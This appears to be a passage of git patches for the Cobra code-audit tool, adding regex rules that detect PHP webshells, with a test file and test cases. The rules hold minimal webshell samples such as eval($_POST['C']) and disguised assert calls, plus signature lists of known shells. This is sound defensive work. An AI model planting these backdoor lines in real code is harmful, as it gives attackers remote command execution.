(\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}(?<!\\>)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\))| - (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\))| - (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}(?<!\\>)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| - (\$(\w*)\s*=\s*\bcreate_function\b\s*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\))| - (\$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}))| - (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}(?<![:>\s])\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| - (sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\()| - (\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1) - (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1)| - (array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input)| - (^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php)| - (\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);)| - (\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\))| - (ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| - (eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| - (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| - (preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| - (ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\))| - (\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C)| - (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| - (\$(\w+)[\s]*\\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\\]\s*\)) - + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) ]]></match> <level value="7"/> <solution> ## 安全风险 + 10101 代码中存在webShell + ## 修复方案 + </solution> <test> <case assert="true"><![CDATA[ - ]]></case> - <case assert="false"><![CDATA[ + <?php + eval($_POST['C']); + ?> ]]></case> </test> <status value="on"/> diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml new file mode 100644 index 00000000..87eb0703 --- /dev/null +++ b/rules/CVI-360002.xml @@ -0,0 +1,23 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell2"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 10102 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + <case assert="false"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml new file mode 100644 index 00000000..0fadffe0 --- /dev/null +++ b/rules/CVI-360003.xml @@ -0,0 +1,23 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell3"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 10103 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + <case assert="false"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml new file mode 100644 index 00000000..05992030 --- /dev/null +++ b/rules/CVI-360007.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell7"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 10107 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php new file mode 100644 index 00000000..4f2cf590 --- /dev/null +++ b/tests/vulnerabilities/webshell.php @@ -0,0 +1,18 @@ +<?php +//cvi-360001 +eval($_POST['C']); + +//cvi-360002 +$a="ss"; +include("sss.jpg"); + +//cvi-360003 +echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) + +//cvi-360007 +array_map("ass\x65rt",(array)$_REQUEST['expdoor']); + +//cvi-360008 + +?> + From 960715aa10d3df6c1bba544cab79eae8d0cb1027 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 17:25:14 +0800 Subject: [PATCH 09/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 17 ++++++----------- rules/CVI-360002.xml | 15 ++++++++------- rules/CVI-360003.xml | 14 ++++++-------- rules/CVI-360007.xml | 10 +++++----- 4 files changed, 25 insertions(+), 31 deletions(-) diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index 5ca863e1..0fb57ad6 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml @@ -3,24 +3,19 @@ <name value="webshell1"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[eval($_POST['C']);]]></case> + </test> <solution> ## 安全风险 - 10101 代码中存在webShell - + 代码中存在webshell ## 修复方案 - + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - <?php - eval($_POST['C']); - ?> - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml index 87eb0703..430020dd 100644 --- a/rules/CVI-360002.xml +++ b/rules/CVI-360002.xml @@ -6,18 +6,19 @@ \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a="ss"; + include("sss.jpg"); + ]]></case> + </test> <solution> ## 安全风险 - 10102 + 代码中存在webshell ## 修复方案 + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - ]]></case> - <case assert="false"><![CDATA[ - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml index 0fadffe0..584f833b 100644 --- a/rules/CVI-360003.xml +++ b/rules/CVI-360003.xml @@ -3,21 +3,19 @@ <name value="webshell3"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) + \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)]]></case> + </test> <solution> ## 安全风险 - 10103 + 代码中存在webshell ## 修复方案 + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - ]]></case> - <case assert="false"><![CDATA[ - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 05992030..6dcdd6e4 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml @@ -6,16 +6,16 @@ (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[array_map("ass\x65rt",(array)$_REQUEST['expdoor']);]]></case> + </test> <solution> ## 安全风险 - 10107 + 代码中存在webshell ## 修复方案 + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file From 4d2190925b9aca7809df124356fbc1e9d82a8215 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 21:50:57 +0800 Subject: [PATCH 10/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360004.xml | 24 ++++++++++++++++++++++++ rules/CVI-360005.xml | 20 ++++++++++++++++++++ rules/CVI-360006.xml | 21 +++++++++++++++++++++ rules/CVI-360008.xml | 22 ++++++++++++++++++++++ rules/CVI-360009.xml | 25 +++++++++++++++++++++++++ rules/CVI-360011.xml | 21 +++++++++++++++++++++ rules/CVI-360012.xml | 21 +++++++++++++++++++++ tests/vulnerabilities/webshell.php | 23 +++++++++++++++++++++++ 8 files changed, 177 insertions(+) create mode 100644 rules/CVI-360004.xml create mode 100644 rules/CVI-360005.xml create mode 100644 rules/CVI-360006.xml create mode 100644 rules/CVI-360008.xml create mode 100644 rules/CVI-360009.xml create mode 100644 rules/CVI-360011.xml create mode 100644 rules/CVI-360012.xml diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml new file mode 100644 index 00000000..f48a0676 --- /dev/null +++ b/rules/CVI-360004.xml @@ -0,0 +1,24 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell4"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $string = 'AABBCCDDEE'; + preg_replace($_POST['A'], $_POST['B'], $string); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml new file mode 100644 index 00000000..86cfbbe3 --- /dev/null +++ b/rules/CVI-360005.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell5"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec) + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360006.xml b/rules/CVI-360006.xml new file mode 100644 index 00000000..ada5df48 --- /dev/null +++ b/rules/CVI-360006.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell6"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$b = $_POST['B']; preg_replace($_POST['A'], $b, $string);]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml new file mode 100644 index 00000000..a99ddcad --- /dev/null +++ b/rules/CVI-360008.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell8"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml new file mode 100644 index 00000000..7353d189 --- /dev/null +++ b/rules/CVI-360009.xml @@ -0,0 +1,25 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell9"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $e = $_REQUEST['e']; + $arr = array($_POST['pass'],); + array_filter($arr, base64_decode($e)); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360011.xml b/rules/CVI-360011.xml new file mode 100644 index 00000000..fd146e44 --- /dev/null +++ b/rules/CVI-360011.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell11"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w*)\s*=\s*\bcreate_function(\b\s)*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$newfunc = create_function(null,'assert($_POST[c]);');$newfunc();]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml new file mode 100644 index 00000000..2ec1505f --- /dev/null +++ b/rules/CVI-360012.xml @@ -0,0 +1,21 @@ 